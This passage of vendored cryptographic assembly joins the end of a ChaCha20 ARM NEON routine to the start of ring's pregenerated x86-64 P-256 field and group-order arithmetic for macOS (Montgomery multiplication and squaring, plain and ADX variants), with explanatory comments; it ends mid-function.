veor q11,q11,q15
vst1.8 {q8,q9},[r14]!
vst1.8 {q10,q11},[r14]!
beq .Ldone_neon
ldmia sp,{r8,r9,r10,r11} @ load key material
add r0,r0,r8 @ accumulate key material
add r8,sp,#4*(4)
add r1,r1,r9
add r2,r2,r10
add r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
add r8,sp,#4*(8)
add r5,r5,r9
add r6,r6,r10
add r7,r7,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
stmia sp,{r0,r1,r2,r3,r4,r5,r6,r7}
add r0,sp,#4*(16+8)
ldmia r0,{r0,r1,r2,r3,r4,r5,r6,r7} @ load second half
add r0,r0,r8 @ accumulate key material
add r8,sp,#4*(12)
add r1,r1,r9
add r2,r2,r10
add r3,r3,r11
ldmia r8,{r8,r9,r10,r11} @ load key material
add r4,r4,r8 @ accumulate key material
add r8,sp,#4*(8)
add r5,r5,r9
add r4,r4,#3 @ counter+3
add r6,r6,r10
add r7,r7,r11
ldr r11,[sp,#4*(32+2)] @ re-load len
# ifdef __ARMEB__
rev r0,r0
rev r1,r1
rev r2,r2
rev r3,r3
rev r4,r4
rev r5,r5
rev r6,r6
rev r7,r7
# endif
stmia r8,{r0,r1,r2,r3,r4,r5,r6,r7}
add r10,sp,#4*(0)
sub r11,r11,#64*3 @ len-=64*3
.Loop_tail_neon:
ldrb r8,[r10],#1 @ read buffer on stack
ldrb r9,[r12],#1 @ read input
subs r11,r11,#1
eor r8,r8,r9
strb r8,[r14],#1 @ store output
bne .Loop_tail_neon
.Ldone_neon:
add sp,sp,#4*(32+4)
vldmia sp,{d8,d9,d10,d11,d12,d13,d14,d15}
add sp,sp,#4*(16+3)
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
.size ChaCha20_ctr32_neon,.-ChaCha20_ctr32_neon
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_ARM) && defined(__ELF__)
|
mi2bjss/Pressel-site | 68,707 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/p256-x86_64-asm-macosx.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && defined(__APPLE__)
.text
.section __DATA,__const
.p2align 6
L$poly:
.quad 0xffffffffffffffff, 0x00000000ffffffff, 0x0000000000000000, 0xffffffff00000001
L$One:
.long 1,1,1,1,1,1,1,1
L$Two:
.long 2,2,2,2,2,2,2,2
L$Three:
.long 3,3,3,3,3,3,3,3
L$ONE_mont:
.quad 0x0000000000000001, 0xffffffff00000000, 0xffffffffffffffff, 0x00000000fffffffe
L$ord:
.quad 0xf3b9cac2fc632551, 0xbce6faada7179e84, 0xffffffffffffffff, 0xffffffff00000000
L$ordK:
.quad 0xccd1c8aaee00bc4f
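// L$poly is the NIST P-256 prime p = 2^256 - 2^224 + 2^192 + 2^96 - 1 and
// L$ord the group order n, both as little-endian 64-bit limbs. L$ONE_mont
// is 2^256 mod p, i.e. 1 in Montgomery form, and L$ordK is the Montgomery
// constant -n^{-1} mod 2^64 used by the ord_* reductions below.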
.text
.globl _ecp_nistz256_neg
.private_extern _ecp_nistz256_neg
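// Computes -a mod p: subtract a from zero with borrow, add p back, then
// use the borrow flag saved in %r13 (via cmovz) to keep the uncorrected
// value when a was zero, so the result is 0 rather than p.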
.p2align 5
_ecp_nistz256_neg:
_CET_ENDBR
pushq %r12
pushq %r13
L$neg_body:
xorq %r8,%r8
xorq %r9,%r9
xorq %r10,%r10
xorq %r11,%r11
xorq %r13,%r13
subq 0(%rsi),%r8
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r8,%rax
sbbq 24(%rsi),%r11
leaq L$poly(%rip),%rsi
movq %r9,%rdx
sbbq $0,%r13
addq 0(%rsi),%r8
movq %r10,%rcx
adcq 8(%rsi),%r9
adcq 16(%rsi),%r10
movq %r11,%r12
adcq 24(%rsi),%r11
testq %r13,%r13
cmovzq %rax,%r8
cmovzq %rdx,%r9
movq %r8,0(%rdi)
cmovzq %rcx,%r10
movq %r9,8(%rdi)
cmovzq %r12,%r11
movq %r10,16(%rdi)
movq %r11,24(%rdi)
movq 0(%rsp),%r13
movq 8(%rsp),%r12
leaq 16(%rsp),%rsp
L$neg_epilogue:
ret
.globl _ecp_nistz256_ord_mul_mont_nohw
.private_extern _ecp_nistz256_ord_mul_mont_nohw
.p2align 5
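// Montgomery product a*b*2^-256 mod n: the four limbs of b are folded in
// one at a time, and after each partial product the lowest accumulator
// limb is cancelled by adding m*n, with m = limb * L$ordK mod 2^64
// (the imulq %r15 below).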
_ecp_nistz256_ord_mul_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_mul_body:
movq 0(%rdx),%rax
movq %rdx,%rbx
leaq L$ord(%rip),%r14
movq L$ordK(%rip),%r15
movq %rax,%rcx
mulq 0(%rsi)
movq %rax,%r8
movq %rcx,%rax
movq %rdx,%r9
mulq 8(%rsi)
addq %rax,%r9
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%r10
mulq 16(%rsi)
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %r8,%r13
imulq %r15,%r8
movq %rdx,%r11
mulq 24(%rsi)
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%r12
mulq 0(%r14)
movq %r8,%rbp
addq %rax,%r13
movq %r8,%rax
adcq $0,%rdx
movq %rdx,%rcx
subq %r8,%r10
sbbq $0,%r8
mulq 8(%r14)
addq %rcx,%r9
adcq $0,%rdx
addq %rax,%r9
movq %rbp,%rax
adcq %rdx,%r10
movq %rbp,%rdx
adcq $0,%r8
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r11
movq 8(%rbx),%rax
sbbq %rdx,%rbp
addq %r8,%r11
adcq %rbp,%r12
adcq $0,%r13
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r9
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %r9,%rcx
imulq %r15,%r9
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r12
adcq $0,%rdx
xorq %r8,%r8
addq %rax,%r12
movq %r9,%rax
adcq %rdx,%r13
adcq $0,%r8
mulq 0(%r14)
movq %r9,%rbp
addq %rax,%rcx
movq %r9,%rax
adcq %rdx,%rcx
subq %r9,%r11
sbbq $0,%r9
mulq 8(%r14)
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rbp,%rax
adcq %rdx,%r11
movq %rbp,%rdx
adcq $0,%r9
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r12
movq 16(%rbx),%rax
sbbq %rdx,%rbp
addq %r9,%r12
adcq %rbp,%r13
adcq $0,%r8
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r10
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rcx,%rax
adcq $0,%rdx
movq %r10,%rcx
imulq %r15,%r10
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r13
adcq $0,%rdx
xorq %r9,%r9
addq %rax,%r13
movq %r10,%rax
adcq %rdx,%r8
adcq $0,%r9
mulq 0(%r14)
movq %r10,%rbp
addq %rax,%rcx
movq %r10,%rax
adcq %rdx,%rcx
subq %r10,%r12
sbbq $0,%r10
mulq 8(%r14)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq %rdx,%r12
movq %rbp,%rdx
adcq $0,%r10
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r13
movq 24(%rbx),%rax
sbbq %rdx,%rbp
addq %r10,%r13
adcq %rbp,%r8
adcq $0,%r9
movq %rax,%rcx
mulq 0(%rsi)
addq %rax,%r11
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 8(%rsi)
addq %rbp,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rcx,%rax
adcq $0,%rdx
movq %rdx,%rbp
mulq 16(%rsi)
addq %rbp,%r13
adcq $0,%rdx
addq %rax,%r13
movq %rcx,%rax
adcq $0,%rdx
movq %r11,%rcx
imulq %r15,%r11
movq %rdx,%rbp
mulq 24(%rsi)
addq %rbp,%r8
adcq $0,%rdx
xorq %r10,%r10
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
adcq $0,%r10
mulq 0(%r14)
movq %r11,%rbp
addq %rax,%rcx
movq %r11,%rax
adcq %rdx,%rcx
subq %r11,%r13
sbbq $0,%r11
mulq 8(%r14)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq %rdx,%r13
movq %rbp,%rdx
adcq $0,%r11
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r8
sbbq %rdx,%rbp
addq %r11,%r8
adcq %rbp,%r9
adcq $0,%r10
movq %r12,%rsi
subq 0(%r14),%r12
movq %r13,%r11
sbbq 8(%r14),%r13
movq %r8,%rcx
sbbq 16(%r14),%r8
movq %r9,%rbp
sbbq 24(%r14),%r9
sbbq $0,%r10
cmovcq %rsi,%r12
cmovcq %r11,%r13
cmovcq %rcx,%r8
cmovcq %rbp,%r9
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_mul_epilogue:
ret
.globl _ecp_nistz256_ord_sqr_mont_nohw
.private_extern _ecp_nistz256_ord_sqr_mont_nohw
.p2align 5
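// Montgomery squaring mod n, repeated %rdx times (the caller passes a
// repeat count). The cross products a[i]*a[j], i < j, are computed once
// and doubled, then the diagonal squares a[i]^2 are added in before the
// usual four reduction steps.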
_ecp_nistz256_ord_sqr_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_sqr_body:
movq 0(%rsi),%r8
movq 8(%rsi),%rax
movq 16(%rsi),%r14
movq 24(%rsi),%r15
leaq L$ord(%rip),%rsi
movq %rdx,%rbx
jmp L$oop_ord_sqr
.p2align 5
L$oop_ord_sqr:
movq %rax,%rbp
mulq %r8
movq %rax,%r9
.byte 102,72,15,110,205
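// The .byte runs in this loop hand-encode SSE movq moves between general
// and xmm registers (this one is movq %rbp,%xmm1), presumably as raw
// bytes for old-assembler compatibility; the input limbs are parked in
// xmm1-xmm3 and pulled back for the diagonal squares further down.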
movq %r14,%rax
movq %rdx,%r10
mulq %r8
addq %rax,%r10
movq %r15,%rax
.byte 102,73,15,110,214
adcq $0,%rdx
movq %rdx,%r11
mulq %r8
addq %rax,%r11
movq %r15,%rax
.byte 102,73,15,110,223
adcq $0,%rdx
movq %rdx,%r12
mulq %r14
movq %rax,%r13
movq %r14,%rax
movq %rdx,%r14
mulq %rbp
addq %rax,%r11
movq %r15,%rax
adcq $0,%rdx
movq %rdx,%r15
mulq %rbp
addq %rax,%r12
adcq $0,%rdx
addq %r15,%r12
adcq %rdx,%r13
adcq $0,%r14
xorq %r15,%r15
movq %r8,%rax
addq %r9,%r9
adcq %r10,%r10
adcq %r11,%r11
adcq %r12,%r12
adcq %r13,%r13
adcq %r14,%r14
adcq $0,%r15
mulq %rax
movq %rax,%r8
.byte 102,72,15,126,200
movq %rdx,%rbp
mulq %rax
addq %rbp,%r9
adcq %rax,%r10
.byte 102,72,15,126,208
adcq $0,%rdx
movq %rdx,%rbp
mulq %rax
addq %rbp,%r11
adcq %rax,%r12
.byte 102,72,15,126,216
adcq $0,%rdx
movq %rdx,%rbp
movq %r8,%rcx
imulq 32(%rsi),%r8
mulq %rax
addq %rbp,%r13
adcq %rax,%r14
movq 0(%rsi),%rax
adcq %rdx,%r15
mulq %r8
movq %r8,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r8,%r10
sbbq $0,%rbp
mulq %r8
addq %rcx,%r9
adcq $0,%rdx
addq %rax,%r9
movq %r8,%rax
adcq %rdx,%r10
movq %r8,%rdx
adcq $0,%rbp
movq %r9,%rcx
imulq 32(%rsi),%r9
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r11
movq 0(%rsi),%rax
sbbq %rdx,%r8
addq %rbp,%r11
adcq $0,%r8
mulq %r9
movq %r9,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r9,%r11
sbbq $0,%rbp
mulq %r9
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %r9,%rax
adcq %rdx,%r11
movq %r9,%rdx
adcq $0,%rbp
movq %r10,%rcx
imulq 32(%rsi),%r10
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r8
movq 0(%rsi),%rax
sbbq %rdx,%r9
addq %rbp,%r8
adcq $0,%r9
mulq %r10
movq %r10,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r10,%r8
sbbq $0,%rbp
mulq %r10
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %r10,%rax
adcq %rdx,%r8
movq %r10,%rdx
adcq $0,%rbp
movq %r11,%rcx
imulq 32(%rsi),%r11
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r9
movq 0(%rsi),%rax
sbbq %rdx,%r10
addq %rbp,%r9
adcq $0,%r10
mulq %r11
movq %r11,%rbp
addq %rax,%rcx
movq 8(%rsi),%rax
adcq %rdx,%rcx
subq %r11,%r9
sbbq $0,%rbp
mulq %r11
addq %rcx,%r8
adcq $0,%rdx
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
movq %r11,%rdx
adcq $0,%rbp
shlq $32,%rax
shrq $32,%rdx
subq %rax,%r10
sbbq %rdx,%r11
addq %rbp,%r10
adcq $0,%r11
xorq %rdx,%rdx
addq %r12,%r8
adcq %r13,%r9
movq %r8,%r12
adcq %r14,%r10
adcq %r15,%r11
movq %r9,%rax
adcq $0,%rdx
subq 0(%rsi),%r8
movq %r10,%r14
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r11,%r15
sbbq 24(%rsi),%r11
sbbq $0,%rdx
cmovcq %r12,%r8
cmovncq %r9,%rax
cmovncq %r10,%r14
cmovncq %r11,%r15
decq %rbx
jnz L$oop_ord_sqr
movq %r8,0(%rdi)
movq %rax,8(%rdi)
pxor %xmm1,%xmm1
movq %r14,16(%rdi)
pxor %xmm2,%xmm2
movq %r15,24(%rdi)
pxor %xmm3,%xmm3
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_sqr_epilogue:
ret
.globl _ecp_nistz256_ord_mul_mont_adx
.private_extern _ecp_nistz256_ord_mul_mont_adx
.p2align 5
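// BMI2/ADX variant: mulxq forms 64x64->128 products without touching
// flags, while adcxq/adoxq maintain two independent carry chains (CF and
// OF), letting the multiply and the Montgomery reduction interleave.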
_ecp_nistz256_ord_mul_mont_adx:
L$ecp_nistz256_ord_mul_mont_adx:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_mulx_body:
movq %rdx,%rbx
movq 0(%rdx),%rdx
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
leaq -128(%rsi),%rsi
leaq L$ord-128(%rip),%r14
movq L$ordK(%rip),%r15
mulxq %r9,%r8,%r9
mulxq %r10,%rcx,%r10
mulxq %r11,%rbp,%r11
addq %rcx,%r9
mulxq %r12,%rcx,%r12
movq %r8,%rdx
mulxq %r15,%rdx,%rax
adcq %rbp,%r10
adcq %rcx,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 24+128(%r14),%rcx,%rbp
movq 8(%rbx),%rdx
adcxq %rcx,%r11
adoxq %rbp,%r12
adcxq %r8,%r12
adoxq %r8,%r13
adcq $0,%r13
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 24+128(%rsi),%rcx,%rbp
movq %r9,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r12
adoxq %rbp,%r13
adcxq %r8,%r13
adoxq %r8,%r8
adcq $0,%r8
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 24+128(%r14),%rcx,%rbp
movq 16(%rbx),%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcxq %r9,%r13
adoxq %r9,%r8
adcq $0,%r8
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%rsi),%rcx,%rbp
movq %r10,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r13
adoxq %rbp,%r8
adcxq %r9,%r8
adoxq %r9,%r9
adcq $0,%r9
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 24+128(%r14),%rcx,%rbp
movq 24(%rbx),%rdx
adcxq %rcx,%r13
adoxq %rbp,%r8
adcxq %r10,%r8
adoxq %r10,%r9
adcq $0,%r9
mulxq 0+128(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%rsi),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%rsi),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%rsi),%rcx,%rbp
movq %r11,%rdx
mulxq %r15,%rdx,%rax
adcxq %rcx,%r8
adoxq %rbp,%r9
adcxq %r10,%r9
adoxq %r10,%r10
adcq $0,%r10
mulxq 0+128(%r14),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq 8+128(%r14),%rcx,%rbp
adcxq %rcx,%r12
adoxq %rbp,%r13
mulxq 16+128(%r14),%rcx,%rbp
adcxq %rcx,%r13
adoxq %rbp,%r8
mulxq 24+128(%r14),%rcx,%rbp
leaq 128(%r14),%r14
movq %r12,%rbx
adcxq %rcx,%r8
adoxq %rbp,%r9
movq %r13,%rdx
adcxq %r11,%r9
adoxq %r11,%r10
adcq $0,%r10
movq %r8,%rcx
subq 0(%r14),%r12
sbbq 8(%r14),%r13
sbbq 16(%r14),%r8
movq %r9,%rbp
sbbq 24(%r14),%r9
sbbq $0,%r10
cmovcq %rbx,%r12
cmovcq %rdx,%r13
cmovcq %rcx,%r8
cmovcq %rbp,%r9
movq %r12,0(%rdi)
movq %r13,8(%rdi)
movq %r8,16(%rdi)
movq %r9,24(%rdi)
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_mulx_epilogue:
ret
.globl _ecp_nistz256_ord_sqr_mont_adx
.private_extern _ecp_nistz256_ord_sqr_mont_adx
.p2align 5
_ecp_nistz256_ord_sqr_mont_adx:
_CET_ENDBR
L$ecp_nistz256_ord_sqr_mont_adx:
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$ord_sqrx_body:
movq %rdx,%rbx
movq 0(%rsi),%rdx
movq 8(%rsi),%r14
movq 16(%rsi),%r15
movq 24(%rsi),%r8
leaq L$ord(%rip),%rsi
jmp L$oop_ord_sqrx
.p2align 5
L$oop_ord_sqrx:
mulxq %r14,%r9,%r10
mulxq %r15,%rcx,%r11
movq %rdx,%rax
.byte 102,73,15,110,206
mulxq %r8,%rbp,%r12
movq %r14,%rdx
addq %rcx,%r10
.byte 102,73,15,110,215
adcq %rbp,%r11
adcq $0,%r12
xorq %r13,%r13
mulxq %r15,%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r12
mulxq %r8,%rcx,%rbp
movq %r15,%rdx
adcxq %rcx,%r12
adoxq %rbp,%r13
adcq $0,%r13
mulxq %r8,%rcx,%r14
movq %rax,%rdx
.byte 102,73,15,110,216
xorq %r15,%r15
adcxq %r9,%r9
adoxq %rcx,%r13
adcxq %r10,%r10
adoxq %r15,%r14
mulxq %rdx,%r8,%rbp
.byte 102,72,15,126,202
adcxq %r11,%r11
adoxq %rbp,%r9
adcxq %r12,%r12
mulxq %rdx,%rcx,%rax
.byte 102,72,15,126,210
adcxq %r13,%r13
adoxq %rcx,%r10
adcxq %r14,%r14
mulxq %rdx,%rcx,%rbp
.byte 0x67
.byte 102,72,15,126,218
adoxq %rax,%r11
adcxq %r15,%r15
adoxq %rcx,%r12
adoxq %rbp,%r13
mulxq %rdx,%rcx,%rax
adoxq %rcx,%r14
adoxq %rax,%r15
movq %r8,%rdx
mulxq 32(%rsi),%rdx,%rcx
xorq %rax,%rax
mulxq 0(%rsi),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 8(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
mulxq 16(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 24(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r8
adcxq %rax,%r8
movq %r9,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adoxq %rcx,%r9
adcxq %rbp,%r10
mulxq 8(%rsi),%rcx,%rbp
adoxq %rcx,%r10
adcxq %rbp,%r11
mulxq 16(%rsi),%rcx,%rbp
adoxq %rcx,%r11
adcxq %rbp,%r8
mulxq 24(%rsi),%rcx,%rbp
adoxq %rcx,%r8
adcxq %rbp,%r9
adoxq %rax,%r9
movq %r10,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adcxq %rcx,%r10
adoxq %rbp,%r11
mulxq 8(%rsi),%rcx,%rbp
adcxq %rcx,%r11
adoxq %rbp,%r8
mulxq 16(%rsi),%rcx,%rbp
adcxq %rcx,%r8
adoxq %rbp,%r9
mulxq 24(%rsi),%rcx,%rbp
adcxq %rcx,%r9
adoxq %rbp,%r10
adcxq %rax,%r10
movq %r11,%rdx
mulxq 32(%rsi),%rdx,%rcx
mulxq 0(%rsi),%rcx,%rbp
adoxq %rcx,%r11
adcxq %rbp,%r8
mulxq 8(%rsi),%rcx,%rbp
adoxq %rcx,%r8
adcxq %rbp,%r9
mulxq 16(%rsi),%rcx,%rbp
adoxq %rcx,%r9
adcxq %rbp,%r10
mulxq 24(%rsi),%rcx,%rbp
adoxq %rcx,%r10
adcxq %rbp,%r11
adoxq %rax,%r11
addq %r8,%r12
adcq %r13,%r9
movq %r12,%rdx
adcq %r14,%r10
adcq %r15,%r11
movq %r9,%r14
adcq $0,%rax
subq 0(%rsi),%r12
movq %r10,%r15
sbbq 8(%rsi),%r9
sbbq 16(%rsi),%r10
movq %r11,%r8
sbbq 24(%rsi),%r11
sbbq $0,%rax
cmovncq %r12,%rdx
cmovncq %r9,%r14
cmovncq %r10,%r15
cmovncq %r11,%r8
decq %rbx
jnz L$oop_ord_sqrx
movq %rdx,0(%rdi)
movq %r14,8(%rdi)
pxor %xmm1,%xmm1
movq %r15,16(%rdi)
pxor %xmm2,%xmm2
movq %r8,24(%rdi)
pxor %xmm3,%xmm3
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$ord_sqrx_epilogue:
ret
.globl _ecp_nistz256_mul_mont_nohw
.private_extern _ecp_nistz256_mul_mont_nohw
.p2align 5
_ecp_nistz256_mul_mont_nohw:
_CET_ENDBR
pushq %rbp
pushq %rbx
pushq %r12
pushq %r13
pushq %r14
pushq %r15
L$mul_body:
movq %rdx,%rbx
movq 0(%rdx),%rax
movq 0(%rsi),%r9
movq 8(%rsi),%r10
movq 16(%rsi),%r11
movq 24(%rsi),%r12
call __ecp_nistz256_mul_montq
movq 0(%rsp),%r15
movq 8(%rsp),%r14
movq 16(%rsp),%r13
movq 24(%rsp),%r12
movq 32(%rsp),%rbx
movq 40(%rsp),%rbp
leaq 48(%rsp),%rsp
L$mul_epilogue:
ret
.p2align 5
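// Montgomery multiplication modulo the P-256 prime. Because p has the
// special form 2^256 - 2^224 + 2^192 + 2^96 - 1, each reduction step
// needs only 32-bit shifts of the limb being cancelled (the shlq/shrq
// $32 pairs) plus one multiply by the top limb of p (%r15).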
__ecp_nistz256_mul_montq:
movq %rax,%rbp
mulq %r9
movq L$poly+8(%rip),%r14
movq %rax,%r8
movq %rbp,%rax
movq %rdx,%r9
mulq %r10
movq L$poly+24(%rip),%r15
addq %rax,%r9
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%r10
mulq %r11
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%r11
mulq %r12
addq %rax,%r11
movq %r8,%rax
adcq $0,%rdx
xorq %r13,%r13
movq %rdx,%r12
movq %r8,%rbp
shlq $32,%r8
mulq %r15
shrq $32,%rbp
addq %r8,%r9
adcq %rbp,%r10
adcq %rax,%r11
movq 8(%rbx),%rax
adcq %rdx,%r12
adcq $0,%r13
xorq %r8,%r8
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r9
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r10
adcq $0,%rdx
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %r9,%rax
adcq %rdx,%r13
adcq $0,%r8
movq %r9,%rbp
shlq $32,%r9
mulq %r15
shrq $32,%rbp
addq %r9,%r10
adcq %rbp,%r11
adcq %rax,%r12
movq 16(%rbx),%rax
adcq %rdx,%r13
adcq $0,%r8
xorq %r9,%r9
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r10
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r11
adcq $0,%rdx
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r13
adcq $0,%rdx
addq %rax,%r13
movq %r10,%rax
adcq %rdx,%r8
adcq $0,%r9
movq %r10,%rbp
shlq $32,%r10
mulq %r15
shrq $32,%rbp
addq %r10,%r11
adcq %rbp,%r12
adcq %rax,%r13
movq 24(%rbx),%rax
adcq %rdx,%r8
adcq $0,%r9
xorq %r10,%r10
movq %rax,%rbp
mulq 0(%rsi)
addq %rax,%r11
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 8(%rsi)
addq %rcx,%r12
adcq $0,%rdx
addq %rax,%r12
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 16(%rsi)
addq %rcx,%r13
adcq $0,%rdx
addq %rax,%r13
movq %rbp,%rax
adcq $0,%rdx
movq %rdx,%rcx
mulq 24(%rsi)
addq %rcx,%r8
adcq $0,%rdx
addq %rax,%r8
movq %r11,%rax
adcq %rdx,%r9
adcq $0,%r10
movq %r11,%rbp
shlq $32,%r11
mulq %r15
shrq $32,%rbp
addq %r11,%r12
adcq %rbp,%r13
movq %r12,%rcx
adcq %rax,%r8
adcq %rdx,%r9
movq %r13,%rbp
adcq $0,%r10
subq $-1,%r12
